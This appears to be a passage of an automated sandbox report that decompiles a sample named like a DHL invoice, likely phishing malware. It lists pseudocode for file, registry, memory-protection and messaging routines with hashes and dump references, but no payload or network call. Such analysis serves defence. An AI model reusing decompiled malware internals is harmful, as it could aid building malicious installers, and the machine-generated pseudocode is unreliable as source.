                                        					 *0x4237a8 =  *0x4237a8 +  *(_t38 - 4);
                                        				} else {
                                        					__ecx = 0x3ff;
                                        					if(__eax > 0x3ff) {
                                        						 *((intOrPtr*)(__ebp - 0xc)) = 0x3ff;
                                        					}
                                        					if( *__esi == __bl) {
                                        						L21:
                                        						__esi =  *((intOrPtr*)(__ebp - 8));
                                        						goto L22;
                                        					} else {
                                        						 *((char*)(__ebp + 0xb)) = __bl;
                                        						 *(__ebp - 0x1c) = E00405F51(__ecx, __esi);
                                        						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
                                        							goto L21;
                                        						} else {
                                        							__esi =  *((intOrPtr*)(__ebp - 8));
                                        							while(1) {
                                        								__eax = __ebp - 0x15;
                                        								__eax = E00405BEB( *(__ebp - 0x1c), __ebp - 0x15, 1); // executed
                                        								if(__eax == 0) {
                                        									break;
                                        								}
                                        								if( *((intOrPtr*)(__ebp - 0x28)) != __ebx) {
                                        									 *(__ebp - 0x15) & 0x000000ff = E00405F38(__edi,  *(__ebp - 0x15) & 0x000000ff);
                                        								} else {
                                        									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                        										__al =  *(__ebp - 0x15);
                                        										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                        											__eax = SetFilePointer( *(__ebp - 0x1c), 0xffffffff, __ebx, 1);
                                        										} else {
                                        											 *((char*)(__esi + __edi)) = __al;
                                        											__esi = __esi + 1;
                                        										}
                                        										break;
                                        									} else {
                                        										__al =  *(__ebp - 0x15);
                                        										 *((char*)(__esi + __edi)) = __al;
                                        										__esi = __esi + 1;
                                        										 *((char*)(__ebp + 0xb)) = __al;
                                        										if(__al == __bl) {
                                        											break;
                                        										} else {
                                        											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
                                        												continue;
                                        											} else {
                                        												break;
                                        											}
                                        										}
                                        									}
                                        								}
                                        								goto L25;
                                        							}
                                        							L22:
                                        							 *((char*)(__esi + __edi)) = __bl;
                                        							if(_t41 == 0) {
                                        								 *(_t38 - 4) = 1;
                                        							}
                                        							goto L24;
                                        						}
                                        					}
                                        				}
                                        				L25:
                                        				return 0;
                                        			}







                                        0x00402631
                                        0x00402633
                                        0x00402636
                                        0x0040263b
                                        0x0040263f
                                        0x00402642
                                        0x00402645
                                        0x004029b8
                                        0x004029bb
                                        0x0040264b
                                        0x0040264b
                                        0x00402652
                                        0x00402654
                                        0x00402654
                                        0x00402659
                                        0x004026e1
                                        0x004026e1
                                        0x00000000
                                        0x0040265f
                                        0x00402660
                                        0x0040266b
                                        0x0040266e
                                        0x00000000
                                        0x00402670
                                        0x00402670
                                        0x00402673
                                        0x00402673
                                        0x0040267c
                                        0x00402683
                                        0x00000000
                                        0x00000000
                                        0x00402688
                                        0x004026b1
                                        0x0040268a
                                        0x0040268e
                                        0x004026bb
                                        0x004026c1
                                        0x004026d9
                                        0x004026cb
                                        0x004026cb
                                        0x004026ce
                                        0x004026ce
                                        0x00000000
                                        0x00402696
                                        0x00402696
                                        0x00402699
                                        0x0040269c
                                        0x0040269f
                                        0x004026a2
                                        0x00000000
                                        0x004026a4
                                        0x004026a7
                                        0x00000000
                                        0x004026a9
                                        0x00000000
                                        0x004026a9
                                        0x004026a7
                                        0x004026a2
                                        0x0040268e
                                        0x00000000
                                        0x00402688
                                        0x004026e4
                                        0x004026e4
                                        0x004015b0
                                        0x00402783
                                        0x00402783
                                        0x00000000
                                        0x004015b0
                                        0x0040266e
                                        0x00402659
                                        0x004029c1
                                        0x004029c7

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: wsprintf
                                        • String ID:
                                        • API String ID: 2111968516-0
                                        • Opcode ID: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                        • Instruction ID: 3a2c95f3f261f3e7b92da62a1208cffd6d7f8b014e901ac2ca999815bcbce589
                                        • Opcode Fuzzy Hash: 366e3e88ed94c459e0a2c565d96ad95acb986587cc084f2d6ef043885af1d26a
                                        • Instruction Fuzzy Hash: 2D21C770C0428AAADF219F644A456BFBB709B11318F14447FE891B63D1C1BD9981CB6D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 70%
                                        			E0040166A() {
                                        				int _t7;
                                        				void* _t13;
                                        				void* _t15;
                                        				void* _t20;
                                        
                                        				_t18 = E00402B2C(0xffffffd0);
                                        				_t16 = E00402B2C(0xffffffdf);
                                        				E00402B2C(0x13);
                                        				_t7 = MoveFileA(_t4, _t5); // executed
                                        				if(_t7 == 0) {
                                        					if( *((intOrPtr*)(_t20 - 0x2c)) == _t13 || E004062DD(_t18) == 0) {
                                        						 *((intOrPtr*)(_t20 - 4)) = 1;
                                        					} else {
                                        						E00405DB9(_t15, _t18, _t16);
                                        						_push(0xffffffe4);
                                        						goto L5;
                                        					}
                                        				} else {
                                        					_push(0xffffffe3);
                                        					L5:
                                        					E00401423();
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t20 - 4));
                                        				return 0;
                                        			}







                                        0x00401673
                                        0x0040167c
                                        0x0040167e
                                        0x00401685
                                        0x0040168d
                                        0x00401699
                                        0x00402783
                                        0x004016ad
                                        0x004016af
                                        0x004016b4
                                        0x00000000
                                        0x004016b4
                                        0x0040168f
                                        0x0040168f
                                        0x004022a4
                                        0x004022a4
                                        0x004022a4
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FileMove
                                        • String ID:
                                        • API String ID: 3562171763-0
                                        • Opcode ID: 72a301eb428ce366fab0a6ba72113071e0df53c1d82ea09ee4a171c26df99c33
                                        • Instruction ID: 640e453824712c844145895a5cc0ad612f484d8213667f841ebeaca416f2c8de
                                        • Opcode Fuzzy Hash: 72a301eb428ce366fab0a6ba72113071e0df53c1d82ea09ee4a171c26df99c33
                                        • Instruction Fuzzy Hash: 81F09031A08210A7CB117FBA9E4DD9F2AA49F42328B20027BB511B22D1D6BC850186AF
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 40%
                                        			E004026EF(intOrPtr __edx, void* __eflags) {
                                        				long _t7;
                                        				long _t9;
                                        				LONG* _t11;
                                        				void* _t13;
                                        				intOrPtr _t14;
                                        				void* _t17;
                                        				void* _t19;
                                        
                                        				_t14 = __edx;
                                        				_push(ds);
                                        				if(__eflags != 0) {
                                        					_t7 = E00402B0A(2);
                                        					_pop(_t13);
                                        					 *((intOrPtr*)(_t19 - 0x10)) = _t14;
                                        					_t9 = SetFilePointer(E00405F51(_t13, _t17), _t7, _t11,  *(_t19 - 0x28)); // executed
                                        					if( *((intOrPtr*)(_t19 - 0x30)) >= _t11) {
                                        						_push(_t9);
                                        						E00405F38();
                                        					}
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}










                                        0x004026ef
                                        0x004026ef
                                        0x004026f0
                                        0x004026f8
                                        0x004026fd
                                        0x004026fe
                                        0x0040270d
                                        0x00402716
                                        0x0040295e
                                        0x00402960
                                        0x00402960
                                        0x00402716
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040270D
                                          • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                        • Instruction ID: f53dea761aa5693b03f4aeaa9096613f160725ff62c28ab2a383c2bfee997f34
                                        • Opcode Fuzzy Hash: a9d8ee2bd697c9ca0f2ad565d07bdf8e6e2528e0a7b3e3f739defcc45e62caf5
                                        • Instruction Fuzzy Hash: 5AE0EDB1A04215BBD702AB95AE89DBE776CEB44315F10043BF201F11C1C67D4941966E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405E8E(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                        				void* _t7;
                                        				long _t8;
                                        				void* _t9;
                                        
                                        				_t7 = E00405DE5(_a4,  &_a12);
                                        				if(_t7 != 0) {
                                        					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                        					return _t8;
                                        				}
                                        				_t9 = 6;
                                        				return _t9;
                                        			}






                                        0x00405e98
                                        0x00405ea1
                                        0x00405eb7
                                        0x00000000
                                        0x00405eb7
                                        0x00405ea5
                                        0x00000000

                                        APIs
                                        • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402BDD,00000000,?,?), ref: 00405EB7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                        • Instruction ID: 95beb03159e1ed36dc188c03c0911f4594c5194c551a9f11594fd4679c6f4357
                                        • Opcode Fuzzy Hash: c5562a190e42d8950a0f575b3a357be24d756bd6a7e1ac790deddfd4386432da
                                        • Instruction Fuzzy Hash: 23E0ECB2014109BEEF095F90ED0ADBB371DEB04315F00492EFA06E4090E7B5A920AA75
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405C1A(void* _a4, void* _a8, long _a12) {
                                        				int _t7;
                                        				long _t11;
                                        
                                        				_t11 = _a12;
                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                        				if(_t7 == 0 || _t11 != _a12) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}





                                        0x00405c1e
                                        0x00405c2e
                                        0x00405c36
                                        0x00000000
                                        0x00405c3d
                                        0x00000000
                                        0x00405c3f

                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,004031B8,00000000,004128C0,00000020,004128C0,00000020,000000FF,00000004,00000000), ref: 00405C2E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                        • Instruction ID: 28dd51bc99cbbe9e43bc3b4155210361b58306b45153a5fd00399a3e640b4bcc
                                        • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                        • Instruction Fuzzy Hash: 3AE0EC3261835AABEF249E559C01EEB7B6CEB05360F044472FD15E6150D231E8219FA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405BEB(void* _a4, void* _a8, long _a12) {
                                        				int _t7;
                                        				long _t11;
                                        
                                        				_t11 = _a12;
                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                        				if(_t7 == 0 || _t11 != _a12) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}





                                        0x00405bef
                                        0x00405bff
                                        0x00405c07
                                        0x00000000
                                        0x00405c0e
                                        0x00000000
                                        0x00405c10

                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031EA,00000000,00000000,00403047,000000FF,00000004,00000000,00000000,00000000), ref: 00405BFF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                        • Instruction ID: 7d11c2845e787d99b8eae26fbbcce04266139d1862b3a193897eab19ac9c5e73
                                        • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                        • Instruction Fuzzy Hash: 72E0E632558759ABDF106E559C00AEB775CEB45754F004832FE15E3150D231E8519BE9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                        
                                        				 *0x73ef4038 = _a4;
                                        				if(_a8 == 1) {
                                        					VirtualProtect(0x73ef404c, 4, 0x40, 0x73ef403c); // executed
                                        					 *0x73ef404c = 0xc2;
                                        					 *0x73ef403c = 0;
                                        					 *0x73ef4044 = 0;
                                        					 *0x73ef4058 = 0;
                                        					 *0x73ef4048 = 0;
                                        					 *0x73ef4040 = 0;
                                        					 *0x73ef4050 = 0;
                                        					 *0x73ef404e = 0;
                                        				}
                                        				return 1;
                                        			}



                                        0x73ef292a
                                        0x73ef292f
                                        0x73ef293f
                                        0x73ef2947
                                        0x73ef294e
                                        0x73ef2953
                                        0x73ef2958
                                        0x73ef295d
                                        0x73ef2962
                                        0x73ef2967
                                        0x73ef296c
                                        0x73ef296c
                                        0x73ef2974

                                        APIs
                                        • VirtualProtect.KERNELBASE(73EF404C,00000004,00000040,73EF403C), ref: 73EF293F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.789361572.0000000073EF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 73EF0000, based on PE: true
                                        • Associated: 00000000.00000002.789352592.0000000073EF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789369353.0000000073EF3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000000.00000002.789378752.0000000073EF5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_73ef0000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9ace5c8892645c5d74c2498772e30c08925c98a49861b053ace80897629ed3b7
                                        • Instruction ID: 7ca97181e204a4ceb838644c6ab136cb24688e33967b79539c353c7bf42f6749
                                        • Opcode Fuzzy Hash: 9ace5c8892645c5d74c2498772e30c08925c98a49861b053ace80897629ed3b7
                                        • Instruction Fuzzy Hash: 95F098BB604276EFC3D0EF6A8444F053EE8E394354B21852AE59CD7251E3F444448F17
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405E60(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                        				void* _t7;
                                        				long _t8;
                                        				void* _t9;
                                        
                                        				_t7 = E00405DE5(_a4,  &_a12);
                                        				if(_t7 != 0) {
                                        					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                        					return _t8;
                                        				}
                                        				_t9 = 6;
                                        				return _t9;
                                        			}






                                        0x00405e6a
                                        0x00405e71
                                        0x00405e84
                                        0x00000000
                                        0x00405e84
                                        0x00405e75
                                        0x00000000

                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EEE,?,?,?,?,00000002,Call), ref: 00405E84
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                        • Instruction ID: 31d842323d9a2f535784a2c12e989c9eb1b9f9f44251d53ba3eec0f14c414acf
                                        • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                        • Instruction Fuzzy Hash: 75D0EC3204420DBADF115F90ED05FAB371DEB14355F004522FE05A4090D2769520AA55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0040159D() {
                                        				int _t5;
                                        				void* _t11;
                                        				int _t14;
                                        
                                        				_t5 = SetFileAttributesA(E00402B2C(0xfffffff0),  *(_t11 - 0x30)); // executed
                                        				_t14 = _t5;
                                        				if(_t14 == 0) {
                                        					 *((intOrPtr*)(_t11 - 4)) = 1;
                                        				}
                                        				 *0x4237a8 =  *0x4237a8 +  *((intOrPtr*)(_t11 - 4));
                                        				return 0;
                                        			}






                                        0x004015a8
                                        0x004015ae
                                        0x004015b0
                                        0x00402783
                                        0x00402783
                                        0x004029bb
                                        0x004029c7

                                        APIs
                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 52ed5338fe7084c51df6a432a079bc0890c4fcb1f0414dd7c874e83e8d0644f6
                                        • Instruction ID: d5005c83e4bc13d794db0995845c4037c46dc405a88debeb1123cd551caf7fcc
                                        • Opcode Fuzzy Hash: 52ed5338fe7084c51df6a432a079bc0890c4fcb1f0414dd7c874e83e8d0644f6
                                        • Instruction Fuzzy Hash: F5D05BB2B08200EBCB11DFE8EF08A5E77B5EB54325F204577E101F21D1D2B88641975A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004040B4(int _a4) {
                                        				struct HWND__* _t2;
                                        				long _t3;
                                        
                                        				_t2 =  *0x422ed8; // 0x103f2
                                        				if(_t2 != 0) {
                                        					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                        					return _t3;
                                        				}
                                        				return _t2;
                                        			}





                                        0x004040b4
                                        0x004040bb
                                        0x004040c6
                                        0x00000000
                                        0x004040c6
                                        0x004040cc

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.779143547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.779109785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779195988.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.779221787.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.780430316.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_DHLINV000156.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                        • Instruction ID: d19a9dbcf4508c1e9b2ca47d0762ffb16ec5c10abf7e35186d5f4f0c6b5da105
                                        • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
